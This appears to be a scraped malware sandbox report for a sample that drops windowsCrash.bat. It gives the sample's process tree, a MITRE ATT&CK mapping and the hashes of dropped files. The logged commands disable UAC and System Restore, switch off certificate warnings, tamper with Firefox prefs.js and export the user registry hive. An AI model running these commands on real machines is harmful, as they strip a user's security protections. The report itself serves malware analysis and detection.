    C:\Windows\system32\reg.exe add "HKEY_CURRENT_USER\SOFTWARE\Policies\Microsoft\Internet Explorer\Control Panel" /v "ResetWebSettings" /t reg_dword /d 00000001 /f
    3⤵
    - System Location Discovery: System Language Discovery
    PID:2400
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo y"
    3⤵
    - System Location Discovery: System Language Discovery
    PID:1088
- - C:\Windows\SysWOW64\reg.exe
    C:\Windows\system32\reg.exe add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "EnableLUA" /t reg_dword /d 00000000 /f
    3⤵
    - UAC bypass
    - System Location Discovery: System Language Discovery
    PID:1940
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c dir /b /s | find /i "java.policy"
    3⤵
    - System Location Discovery: System Language Discovery
    PID:328
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /S /D /c" dir /b /s "
      4⤵
      System Location Discovery: System Language Discovery
      PID:2260
  - - C:\Windows\SysWOW64\find.exe
      find /i "java.policy"
      4⤵
      System Location Discovery: System Language Discovery
      PID:1704
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c dir "\Users\Admin\.." /b /s | find "prefs.js"
    3⤵
    - System Location Discovery: System Language Discovery
    PID:2060
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /S /D /c" dir "\Users\Admin\.." /b /s "
      4⤵
      System Location Discovery: System Language Discovery
      PID:3008
  - - C:\Windows\SysWOW64\find.exe
      find "prefs.js"
      4⤵
      System Location Discovery: System Language Discovery
      PID:2120
- - C:\Windows\SysWOW64\attrib.exe
    attrib.exe -r "C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\id09dv1m.default-release\prefs.js "
    3⤵
    - System Location Discovery: System Language Discovery
    - Views/modifies file attributes
    PID:292
- - C:\Windows\SysWOW64\attrib.exe
    attrib.exe -r "C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\id09dv1m.default-release\prefs.js "
    3⤵
    - System Location Discovery: System Language Discovery
    - Views/modifies file attributes
    PID:2516
- - C:\Windows\SysWOW64\attrib.exe
    attrib.exe +r "C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\id09dv1m.default-release\prefs.js "
    3⤵
    - System Location Discovery: System Language Discovery
    - Views/modifies file attributes
    PID:2532
- - C:\Windows\SysWOW64\reg.exe
    C:\Windows\system32\reg.exe export HKU C:\Users\Admin\AppData\Local\Temp\~r.tmp
    3⤵
    - System Location Discovery: System Language Discovery
    PID:304
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" type C:\Users\Admin\AppData\Local\Temp\~r.tmp "
    3⤵
    - System Location Discovery: System Language Discovery
    PID:1752
- - C:\Windows\SysWOW64\find.exe
    C:\Windows\system32\find.exe "Internet Explorer\Main"
    3⤵
    - System Location Discovery: System Language Discovery
    PID:3012
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c type C:\Users\Admin\AppData\Local\Temp\~i.tmp | C:\Windows\system32\find.exe "S-1-5-21"
    3⤵
    - System Location Discovery: System Language Discovery
    PID:308
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /S /D /c" type C:\Users\Admin\AppData\Local\Temp\~i.tmp "
      4⤵
      System Location Discovery: System Language Discovery
      PID:2988
  - - C:\Windows\SysWOW64\find.exe
      C:\Windows\system32\find.exe "S-1-5-21"
      4⤵
      System Location Discovery: System Language Discovery
      PID:2168
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo y"
    3⤵
    - System Location Discovery: System Language Discovery
    PID:2992
- - C:\Windows\SysWOW64\reg.exe
    C:\Windows\system32\reg.exe add "HKU\S-1-5-21-3434294380-2554721341-1919518612-1000\Software\Microsoft\Windows\CurrentVersion\Internet Settings" /v "WarnonBadCertRecving" /t REG_DWORD /d "0x00000000" /f
    3⤵
    - System Location Discovery: System Language Discovery
    PID:2940
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo y"
    3⤵
    - System Location Discovery: System Language Discovery
    PID:2772
- - C:\Windows\SysWOW64\reg.exe
    C:\Windows\system32\reg.exe add "HKU\S-1-5-21-3434294380-2554721341-1919518612-1000\Software\Microsoft\Windows\CurrentVersion\Internet Settings" /v "WarnOnIntranet" /t REG_DWORD /d "0x00000000" /f
    3⤵
    - System Location Discovery: System Language Discovery
    PID:2732
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo y"
    3⤵
    - System Location Discovery: System Language Discovery
    PID:2684
- - C:\Windows\SysWOW64\reg.exe
    C:\Windows\system32\reg.exe add "HKU\S-1-5-21-3434294380-2554721341-1919518612-1000\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap" /v "AutoDetect" /t REG_DWORD /d "0x00000000" /f
    3⤵
    - System Location Discovery: System Language Discovery
    PID:1572
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo y"
    3⤵
    - System Location Discovery: System Language Discovery
    PID:2812
- - C:\Windows\SysWOW64\reg.exe
    C:\Windows\system32\reg.exe add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SystemRestore" /v DisableSR /t REG_DWORD /d 0x00000001 /f
    3⤵
    - System Location Discovery: System Language Discovery
    PID:1700

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Privilege Escalation

Abuse Elevation Control Mechanism

T1548

Bypass User Account Control

T1548.002

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Defense Evasion

Abuse Elevation Control Mechanism

T1548

Bypass User Account Control

T1548.002

Hide Artifacts

T1564

Hidden Files and Directories

T1564.001

Impair Defenses

T1562

Disable or Modify Tools

T1562.001

Modify Registry

T1112

Credential Access

Unsecured Credentials

T1552

Credentials In Files

T1552.001

Discovery

Remote System Discovery

T1018

System Information Discovery

T1082

System Location Discovery

T1614

System Language Discovery

T1614.001

System Network Configuration Discovery

T1016

Internet Connection Discovery

T1016.001

Lateral Movement

Collection

Data from Local System

T1005

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

Filesize
342B

MD5
0718643eb880335ca3b0738269b86641

SHA1
5d5df87b873093b22868393cb353dce44401d930

SHA256
c737fb98efd1a81c492c8b51429befc98748b411ddfbf9ba5aad7392286d60a3

SHA512
b708db945f4a856fee44c7a7d2ea36009b658efd2f4d91d2cd671e4a3079418d8b7c0006e30f33980775440fe1cba6bb75c0fc9af4d3efdbb42b6ff2b5e3af58

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

Filesize
342B

MD5
dac58bd1b067d2815554d68b3e8ffe7d

SHA1
1d81c99e23b824acb2af0d7a6737cc1fdd42d4e8

SHA256
19b43816b3aae74e3c4c96916e34fdb1006c27dc5497249766bf642bcc7b5b78

SHA512
ed31655a6bb46a893a1364ab0919f6e5672a03fad1a5b607c93c23f0a157073d979712f84b23b79f5dcb0e6e9ed46de4d5daa2443dfa509d09cf97d1ca5d8f8d

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

Filesize
342B

MD5
ee839a548eed89e0e66efc6a0499fd12

SHA1
f7f920a7fc6bc432d5c7c850f498bd082d5adc0e

SHA256
76875ddc847eaf2c481eedece8b87ba7560da44a86c8578f6c2b45bdd92a7543

SHA512
a0b6e50e2f6d683d896ab8cb6ecdd976be04a29a7faf8bbf4143c3467beeec6a6fdc86b7aec76ff921af6377fe36065130098aa0c52ebc75a751d7032df956a7

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

Filesize
342B

MD5
04e1914dddb59c2c1788213940d4d723

SHA1
8a1c9d63e777148fcbdbe95e640eedf3df089317

SHA256
4b8127f3810fd1162961a11b7d402f98304ca6c0b9a328b8749c5812ad0189ac

SHA512
25a7f05eab88ce250f6ee307ecb124ffb93abc49bb95f6c5c70f62b5d70595227fbd24ac69f06eb86689c45aa84b9c261da452618372dc3b2d6a63d2fbf9d034

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

Filesize
342B

MD5
b82d8b3a2a8bc659fd3596308204d7b7

SHA1
f10c2ad0ad21566c75670d561f250ec551ddfea3

SHA256
ae301f3d4800f0b43863529fa67be87687c73def5eef917875dcb46cf511e7f7

SHA512
b485146309e6f411a9ae6d72d5d57ca34540cdd6e693ab728682a4eb4f261c91583c4df76d15169fff0f80aef5e164e159df985f455bf0116dce507325623359

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

Filesize
342B

MD5
f77ffb439d86e2e936f4348bd680de1f

SHA1
be1870fa13f4bef31cd98606a8dcce4272446d42

SHA256
1c9f9a92c403f22a0575001adca99acf9c2dd408d389e04932eccf3d586ab8c0

SHA512
ba74d5e72913e6dc95bae807a3f638695543cd25da9a8f0220163c4e30a640e34a215e00c03a261075838f17bc8b62d1cb8631c534e3324fca31bf1e39e6c041

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

Filesize
342B

MD5
a3bed85b05802c2ade2975a070c1f7ea

SHA1
87ded6c6aab96bc73608be5ea844463d3829be9d

SHA256
95b605cee29341a05311801900dc974fe4033128622ca530ba1a79d4f88b7645

SHA512
2b9a163e785280847bcc92f7e4bb09079c417bf49e7540b8b7b3fe171b165206373642cde8ccd6750050b13c3ae0ef6aef14d649fb1b45763bbd8330836cabbd

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

Filesize
342B

MD5
5fbe6ad77054793b6e8b660512b2ca3d

SHA1
50d261575b664d6a76c21bfc2c4832b753235815

SHA256
f9cfb57c09c7849d8456083176c7413a7b9236e4094a7a631bc4ccd4e66f9868

SHA512
ac85230c5ec3272ba5417aa35eb5266bce270b124e0822c0b0ff534df57d6830e221eb3d6c83a896bfeb5c0df72a79df19b362bec1823a080e2e94a3383007f1

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

Filesize
342B

MD5
1d2a5f0703f2e80c03f060b4ca3eea0e

SHA1
4acc43ec88dd8243b1b5bf8263d54c796559607d

SHA256
7fb6e711ee2c0d6f8b21eade1817b2e68423f021a4a2e27cd50d96ef22872971

SHA512
01c6447d33646783449328b1721ebc1ba77313ad4fbf6407bafada08f031becb1d78bebea403025208904f4c4886231e92353d42d31ef45d0e57877b3a285123

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

Filesize
342B

MD5
a1d3b9445319e3f4b1c34f4922c93e07

SHA1
4a60125dbe76957c101bef0aa3c1f3ca34394b2a

SHA256
d579ae76210f24e9eb18f577ad9818f3da6f5c2c267a77e30971e159fad8a7a1

SHA512
b9594ddb61d11a290d3a24a6cac5b13082d16735b264e93f9c1fa839c8847c4e2b42cc5b071ace7bff97797b5a99e3ea0a89924b411ccd6eaf00c863f97d9827

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

Filesize
342B

MD5
481a83e998e74fa37e55db67854acefb

SHA1
d2519b8b1bff6395ad40945a9e3d4f90523ae526

SHA256
f90e45743dfd1152b2236f2924e304b922b4f930ed5c5b77179d25868ed5f415

SHA512
78cbfb62dbef84a441a662076a415437e672a34cfa6c62df48f4e2cf8ea611dfc08a664f867c7575c5d860d9cf02e478649099cf1a7aec0b5fb55d9e1681ce23

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

Filesize
342B

MD5
f51a181dd4095b1bc6cafd51813255f1

SHA1
daa94ca6cf2b41b743c7117c657da83a95e3c659

SHA256
d5493420da888da38e2b87774e34fd98d0f24ffd5242e0187604641c2835169c

SHA512
23d4fe1a52c1b54433ef2c1b38aa593c53e6e72a1251942ffea5afab6ccffaca926124d38fb6dfbac1b8b8cd58372b235cbf95a0f2901c1b19c1d7e7236a924b

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

Filesize
342B

MD5
c07625ceebcb45b0b73febcd6a71bdf4

SHA1
a31e1442a20996a466cc0fad17b5b50354fccb7a

SHA256
e2651da11776aa4c0d096e38f05da3c55e28b25aa26e79654c515d7134daf1d5

SHA512
b0bf1a2cf239d78abf0b9ec070c80ff3a67aba70cd1a5c17f44efa81de2635ff668c57a0f554449857e13cf65270410567647fea1d95e25a25d5149baff23964

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

Filesize
342B

MD5
b50d59f5085ff5ecd9616ecb412bd856

SHA1
a41266666b7a48307d9d43009ab8877c62e28de7

SHA256
e456c098aaab42346f5803dfcf26d2694c3ee7f21c7ca543c399e27571bfb1f9

SHA512
06be0885af7870780d2a52c94d136ec82efb2a2c4987019873c886e101ddf22f907b10274baa730161936c66ceff9e561bec82d2cbdc46bca447771101c5ed91

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

Filesize
342B

MD5
35c269cc54b518b1dcb08c814973ee4e

SHA1
a5580550892f24400087901c8cc5567792930de7

SHA256
f0cf4f1ba583649c42f191bf2327100976016a507bc7c70511e223d46c71ce76

SHA512
fe50d8ec9811db43d704afa18506d04017e939b336a3a7ffc63a46a94cd924a20fb661581964d3ae095bc14bf4e58f088d63a9aecb15cfb8e724ce4f3d3fd445

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

Filesize
342B

MD5
b574627c40d1d5a600d4a907fe336c6f

SHA1
3777215e805c0dc4409c17a2babb8389e0e39600

SHA256
0bff38e9dcceae41ee3a161923aa6a39bc326ba83411068cbd6f43ab9c83bd4b

SHA512
ea9051744aa56cc7a1b945b3f5148357997d66638a9cb36247c72850108943d4e3a1be4475af84f51c8bb7231e53caa3d9156efaf13a02888ae51288cdf614f7

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

Filesize
342B

MD5
07754d894ad0e935e7b70ac1cbee1f22

SHA1
60772edb80824a756bbfd8a044471499dd9b29e8

SHA256
45895a740fafce6fb186cddd3c58d3d45890ee5ced5082c42f58da73dc28952c

SHA512
191af4a510246d5fe429541603c96d2f41f800dea20ecd36df10d0836fdf49da9a050ea1b841c069e47e16e99ec986e3a07e003f5ec2c266f10cc7b01dad2aa3

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

Filesize
342B

MD5
1af7e698238672db8e4efdf6156a6875

SHA1
c75c094a670d095a3d4fceeeccee29d19bcc0e13

SHA256
9a2ca693527d5980b1dd592d8accedfa700c026a503974263ed80783b7d208da

SHA512
1d184358b74d03475a8db86b08169f33462b06543b84b7488ea58a189e7c4e0c3b472d630407d3e92d93e006174169709e0f3060ffcc9ac995eb4c0b9932ae07

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

Filesize
342B

MD5
c51f04e911113ffb8a62f47958de9819

SHA1
1cd4d34c58d374e93702db796dd64e5bc47f4fc6

SHA256
fb7493b3a2ee7f1e922e4aa8df04b260a9bdc0a44e41487a60f31b15ea2e8248

SHA512
8045bf82055fcbb54719c7c1464d21331b40f57060cd150d95f2d06d2eb593ad45e18628ff62ebfccf5ad26df0b063778b455a7f1765070aa0b014008dc99ceb

Download Submit
C:\Users\Admin\AppData\Local\Temp\7D6A.tmp\windowsCrash.bat

Filesize
23KB

MD5
3073a254402f863c4739bb8139d5b8b0

SHA1
8c984bbd91b09fb15e0684bce0130c14f031e679

SHA256
b9f6a9a9b2fd2b001e27434076466a86040c960c298fc49cf1147b77bc7d0e31

SHA512
9c687e549bb0edc38f6ec381480cdbcf19432305d1c5ce6c6f4ba2701509317f412f5364615f3cac485ba43e5d8c09a883953b735c7ce59ec209c05464c30788

Download Submit
C:\Users\Admin\AppData\Local\Temp\Cab958E.tmp

Filesize
70KB

MD5
49aebf8cbd62d92ac215b2923fb1b9f5

SHA1
1723be06719828dda65ad804298d0431f6aff976

SHA256
b33efcb95235b98b48508e019afa4b7655e80cf071defabd8b2123fc8b29307f

SHA512
bf86116b015fb56709516d686e168e7c9c68365136231cc51d0b6542ae95323a71d2c7acec84aad7dcecc2e410843f6d82a0a6d51b9acfc721a9c84fdd877b5b

Download Submit
C:\Users\Admin\AppData\Local\Temp\KB_ELZYPTFV.txt

Filesize
4KB

MD5
f7a3f7e2f7882d8bb46e4d84fad60d76

SHA1
485206a880d84f3182e045533769439eebf58458

SHA256
6367ea9f00846cfbf313729a6d23a3b3af3dd144bc2bc6db6cd89b6fa5614405

SHA512
614705034f008e8cfa827e1722bfdab34fa913188a48ebbab63e5f62bca12edbd58af048c38eadc0411951bb7357b1648b5f8a224c0aa344e3ac96860631558e

Download Submit
C:\Users\Admin\AppData\Local\Temp\Tar964D.tmp

Filesize
181KB

MD5
4ea6026cf93ec6338144661bf1202cd1

SHA1
a1dec9044f750ad887935a01430bf49322fbdcb7

SHA256
8efbc21559ef8b1bcf526800d8070baad42474ce7198e26fa771dbb41a76b1d8

SHA512
6c7e0980e39aacf4c3689802353f464a08cd17753bd210ee997e5f2a455deb4f287a9ef74d84579dbde49bc96213cd2b8b247723919c412ea980aa6e6bfe218b

Download Submit
C:\Users\Admin\AppData\Local\Temp\~i.tmp

Filesize
935B

MD5
a06ec456179f0f64755bfe2ee08b02f3

SHA1
d108ba8b679658989bcb55b3d280a6ffe4044dda

SHA256
4ec238a2833e0989c712bf846c3291008f0fe156e6fe2ed801a61c375546d275

SHA512
2ce5f39e87785fe843077f36da44c54ccc60d0c5b79fd625bb9465ecfa6470e3f3e2f04ad7a47fefd2c8ee6e4780d9d11937bea8fe2d86c5c07d15b1f7c76817

Download Submit
C:\Users\Admin\AppData\Local\Temp\~r.tmp

Filesize
3.5MB

MD5
f675782922eb37ddbb00036af9ed0e38

SHA1
98dd59d9be19bee846dad05c8192a2639206c1d1

SHA256
e752d932dd14a0fce6aaed9228d6d3ce524cd5b51c3306476e86b24a0ab29d73

SHA512
056a30fb9ea5cdcd349823b7adc066051db1722fb20c71dc4df4fe3297fcefdc34b3c387971cfea2cf95c90fbb16633f35665878cff4fdfd4c42533ff53b99d7

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\id09dv1m.default-release\prefs.js

Filesize
6KB

MD5
609a0598aca43bb4e0c29dcedbc5d1ee

SHA1
77196a118311705b59cd352bce18752e372353c4

SHA256
d0babdb4e9327151342a7ac0e7d0adc0b0aff137a435315b0224bb67eca4a4c2

SHA512
350b9d9154fe5dbe70abbbb546b607b80736ba12dd9715c0d46f11a46091414be9e89b3708e06e9d673dc7209eb787bcaa0dfe702ed77d0c5c72e670fa35f00b

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\id09dv1m.default-release\prefs.js

Filesize
6KB

MD5
0225b43a7054ce12df489b1daaa70a9e

SHA1
9dbe79240a14ed92f3b9d75c2ab64e330b777591

SHA256
0b73f6ae97bb9067bc9c08af52abf3a5d6547ba47930c7b8f3a715804a42acc6

SHA512
64e3dfa4e6c0493cfc58025991a71571945a4b87d6f27761f933b502a01d239078fc0713f6254ab3d525c1d49b076b58dfae8a986c61c5706eb28217af07b989

Download Submit
memory/2724-1-0x0000000000400000-0x0000000000417000-memory.dmp

Filesize
92KB

Download
memory/2724-177-0x0000000000400000-0x0000000000417000-memory.dmp

Filesize
92KB

Download

Analysis

Sharing

General

Malware Config

Signatures

Processes

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads